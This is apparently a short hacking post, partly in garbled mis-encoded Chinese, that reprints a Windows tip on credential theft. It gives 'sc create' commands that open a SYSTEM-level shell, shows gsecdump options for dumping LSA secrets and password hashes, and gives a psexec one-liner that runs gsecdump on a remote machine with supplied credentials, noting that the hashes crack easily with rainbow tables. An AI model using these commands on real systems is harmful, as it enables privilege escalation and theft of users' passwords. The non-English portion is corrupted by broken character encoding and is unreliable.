HASHעʽ
o get a DOS Prompt as NT system:C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
CreateService SUCCESS
C:\>sc start shellcmdline
StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:\>sc delete shellcmdline
DeleteService SUCCESS
------------
Then in the new DOS window:
Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (ӱjohannes.gumbel@truesec.se)
usage: gsecdump
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - ӱwww.sysinternals.com
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
ʾһ,ʹpshtools߰еiam,ѸղʹgsecdumpץȡHASHϢ뱾صlsass,ʵhashעʽ,,¹Աеæ,ARPƭʱõLM/NThash,gethashõ,ʵƽ,ù,ԭ˵ĺ,4λ127λ,ֻҪhash,100%ܸ㶨.
ԭij:ӱhttp://truesecurity.se/blogs/mur ... -text-password.aspx
ҿԭijò/2007/03/16/ưࡣ
ҳ:
[1]